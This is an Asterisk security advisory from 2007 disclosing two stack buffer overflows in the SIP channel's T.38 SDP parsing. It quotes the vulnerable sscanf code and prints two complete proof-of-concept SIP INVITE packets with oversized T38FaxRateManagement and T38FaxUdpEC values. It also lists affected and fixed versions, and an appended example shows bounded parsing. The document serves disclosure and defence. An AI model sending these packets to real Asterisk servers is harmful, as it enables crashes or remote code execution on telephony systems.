ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code
> Asterisk Project Security Advisory - ASA-2007-010
>
> +------------------------------------------------------------------------+
> | Product | Asterisk |
> |--------------------+---------------------------------------------------|
> | Summary | Two stack buffer overflows in SIP channel's T.38 |
> | | SDP parsing code |
> |--------------------+---------------------------------------------------|
> | Nature of Advisory | Exploitable Stack Buffer Overflow |
> |--------------------+---------------------------------------------------|
> | Susceptibility | Remote Unauthenticated Sessions |
> |--------------------+---------------------------------------------------|
> | Severity | Moderate |
> |--------------------+---------------------------------------------------|
> | Exploits Known | No |
> |--------------------+---------------------------------------------------|
> | Reported On | March 22, 2007 |
> |--------------------+---------------------------------------------------|
> | Reported By | Barrie Dempster, NGS Software, |
> | | <barrie@xxxxxxxxxxxxxxx> |
> |--------------------+---------------------------------------------------|
> | Posted On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Last Updated On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Advisory Contact | kpfleming@xxxxxxxxxx |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Description                                                            |
> +------------------------------------------------------------------------+
>
> Two closely related stack-based buffer overflows exist in the SIP/SDP
> handler of Asterisk; the vulnerabilities are very similar but exist as
> two separate unsafe function calls. The T38FaxRateManagement and
> T38FaxUdpEC SDP parameters can be exploited remotely, leading to
> arbitrary code execution without authentication. In order for these
> overflows to occur, t38 fax over SIP must be enabled in sip.conf.
> Examples of SIP INVITE packets are shown below; however, these
> vulnerabilities can be triggered with a number of different SIP messages
> affecting calls received by Asterisk, or in response to calls made by
> Asterisk.
>
> Remote Unauthenticated stack overflow in Asterisk SIP/SDP
> T38FaxRateManagement parameter
>
> A remote unauthenticated stack overflow exists in the SIP/SDP handler of
> Asterisk. By sending a SIP packet with SDP data which includes an overly
> long T38 parameter it is possible to overflow a stack-based buffer and
> execute arbitrary code.
>
> The process_sdp function of chan_sip.c in Asterisk contains the
> following vulnerable call to sscanf.
>
>     else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
>         found = 1;
>         if (option_debug > 2)
>             ast_log(LOG_DEBUG, "RateMangement: %s\n", s);
>         if (!strcasecmp(s, "localTCF"))
>             peert38capability |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
>         else if (!strcasecmp(s, "transferredTCF"))
>             peert38capability |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
>
> This attempts to read the "T38FaxRateManagement:" option from the SDP
> within a SIP packet and copy the succeeding string into "s". There are
> no checks on the length of this string and we can therefore write past
> the boundaries of the "s" variable, overwriting adjacent memory on the
> stack. "s" is defined earlier in this function as being a character
> array of only 256 bytes. The following example packet demonstrates an
> overflow of this parameter:
>
>     INVITE sip:200@xxxxxxxxx SIP/2.0
>     Date: Wed, 21 Mar 2007 4:20:09 GMT
>     CSeq: 1 INVITE
>     Via: SIP/2.0/UDP 10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
>     User-Agent: NGS/2.0
>     From: "Barrie Dempster" <sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
>     Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
>     To: <sip:200@localhost>
>     Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
>     Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
>     Content-Type: application/sdp
>     Content-Length: 796
>     Max-Forwards: 70
>
>     v=0
>     o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
>     s=-
>     c=IN IP4 127.0.0.1
>     t=0 0
>     m=image 5004 UDPTL t38
>     a=T38FaxVersion:0
>     a=T38MaxBitRate:14400
>     a=T38FaxMaxBuffer:1024
>     a=T38FaxMaxDatagram:238
>     a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAA
>     a=T38FaxUdpEC:t38UDPRedundancy
>
> -------------------------------------------------
>
> Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC
> parameter
>
> A remote unauthenticated stack overflow exists in the SIP/SDP handler of
> Asterisk. By sending a SIP packet with SDP data which includes an overly
> long T38FaxUdpEC parameter it is possible to overflow a stack-based
> buffer and execute arbitrary code.
>
> The process_sdp function of chan_sip.c in Asterisk contains the
> following vulnerable call to sscanf.
>
>     else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
>         found = 1;
>         if (option_debug > 2)
>             ast_log(LOG_DEBUG, "UDP EC: %s\n", s);
>         if (!strcasecmp(s, "t38UDPRedundancy")) {
>             peert38capability |= T38FAX_UDP_EC_REDUNDANCY;
>             ast_udptl_set_error_correction_scheme(p->udptl,
>                 UDPTL_ERROR_CORRECTION_REDUNDANCY);
>
> This attempts to read the "T38FaxUdpEC:" option from the SDP within a
> SIP packet and copy the succeeding string into "s". There are no checks
> on the length of this string and we can therefore write past the
> boundaries of the "s" variable, overwriting adjacent memory on the stack.
> "s" is defined earlier in this function as being a character array of
> only 256 bytes. The following example packet demonstrates an overflow of
> this parameter:
>
>     INVITE sip:200@xxxxxxxxx SIP/2.0
>     Date: Wed, 21 Mar 2007 4:20:09 GMT
>     CSeq: 1 INVITE
>     Via: SIP/2.0/UDP 10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
>     User-Agent: NGS/2.0
>     From: "Barrie Dempster" <sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
>     Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
>     To: <sip:200@localhost>
>     Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
>     Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
>     Content-Type: application/sdp
>     Content-Length: 796
>     Max-Forwards: 70
>
>     v=0
>     o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
>     s=-
>     c=IN IP4 127.0.0.1
>     t=0 0
>     m=image 5004 UDPTL t38
>     a=T38FaxVersion:0
>     a=T38MaxBitRate:14400
>     a=T38FaxMaxBuffer:1024
>     a=T38FaxMaxDatagram:238
>     a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>     AAAAAAAAA
>
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Resolution | T.38 support in the affected versions of Asterisk is not |
> | | enabled by default, therefore the severity of this issue |
> | | is 'moderate'. |
> | | |
> | | Users who are using the default configuration with |
> | | 't38_udptl' set to 'no' or an equivalent value are not |
> | | susceptible to this vulnerability. Users who have set |
> | | this configuration item to 'yes' or an equivalent value |
> | | but are not actually using T.38 support can set it to |
> | | 'no' to secure their systems against this vulnerability. |
> | | |
> | | All other users are urged to upgrade to the appropriate |
> | | version of their Asterisk product listed in the |
> | | 'Corrected In' section below. |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Affected Versions |
> |------------------------------------------------------------------------|
> | Product | Release | |
> | | Series | |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.0.x | not affected; does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.2.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.4.x | all releases prior to |
> | | | 1.4.3 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | A.x.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | B.x.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | AsteriskNOW | pre-release | all releases prior to and |
> | | | including Beta 5 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Appliance Developer | 0.x.x | all releases prior to |
> | Kit | | 0.4.0 |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Corrected In |
> |------------------------------------------------------------------------|
> | Product | Release |
> |--------------------+---------------------------------------------------|
> | Asterisk Open | 1.4.3, available from |
> | Source | ftp://ftp.digium.com/pub/telephony/asterisk |
> |--------------------+---------------------------------------------------|
> | AsteriskNOW | Beta 6, when available from |
> | | http://www.asterisknow.org; Beta 5 users can use |
> | | 'System Update' in the appliance control panel to |
> | | update their version of AsteriskNOW |
> |--------------------+---------------------------------------------------|
> | Asterisk Appliance | 0.4.0, available from |
> | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Links | |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Asterisk Project Security Advisories are posted at |
> | http://www.asterisk.org/security. |
> | |
> | This document may be superseded by later versions; if so, the latest |
> | version will be posted at |
> | http://www.asterisk.org/files/ASA-2007-010.pdf. |
> +------------------------------------------------------------------------+
>
> Asterisk Project Security Advisory - ASA-2007-010
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in its
> original, unaltered form.
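The fix the advisory describes in prose, as an added example that is not code from the advisory or from Asterisk: the same T38FaxRateManagement parse done with a field width on sscanf plus a check that rejects values longer than the buffer instead of truncating them. It assumes the attribute string starts at the parameter name (as the advisory's `a` does); `SBUF`, the enum, and the helper names, including the constructed-input helper `bounded_result_for_length`, are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define SBUF 256                          /* the advisory's 256-byte "s" */
#define PFX "T38FaxRateManagement:"
#define PFXLEN (sizeof(PFX) - 1)

enum rate_mgmt { RM_INVALID = -1, RM_NONE, RM_LOCAL_TCF, RM_TRANSFERRED_TCF };

/* Bounded form of the advisory's sscanf: width 255 (SBUF-1) makes sscanf
 * stop inside s and NUL-terminate; %n records how far attr was consumed.
 * A non-blank byte after that point means the value did not fit in s, so
 * it is rejected rather than silently truncated.
 * Returns 1 on success, 0 if the attribute is absent, -1 if over-long. */
static int parse_bounded(const char *attr, char s[SBUF])
{
    int consumed = 0;
    s[0] = '\0';
    if (sscanf(attr, PFX "%255s%n", s, &consumed) != 1)
        return 0;
    if (attr[consumed] != '\0' && !strchr(" \t\r\n", attr[consumed])) {
        s[0] = '\0';
        return -1;
    }
    return 1;
}

/* Maps the attribute to the capability the advisory's code sets. */
static enum rate_mgmt rate_mgmt_from_sdp(const char *attr)
{
    char s[SBUF];
    int rc = parse_bounded(attr, s);
    if (rc < 0) return RM_INVALID;
    if (rc == 1 && !strcasecmp(s, "localTCF")) return RM_LOCAL_TCF;
    if (rc == 1 && !strcasecmp(s, "transferredTCF")) return RM_TRANSFERRED_TCF;
    return RM_NONE;
}

/* Hypothetical helper: builds a constructed attribute carrying n 'A' bytes
 * (like the advisory's sample packet) and reports the parser's verdict. */
static int bounded_result_for_length(size_t n)
{
    char attr[PFXLEN + 1024 + 1], s[SBUF];
    if (n > 1024) return -2;
    memcpy(attr, PFX, PFXLEN);
    memset(attr + PFXLEN, 'A', n);
    attr[PFXLEN + n] = '\0';
    return parse_bounded(attr, s);
}
```

The same width-plus-length check applies unchanged to the T38FaxUdpEC call.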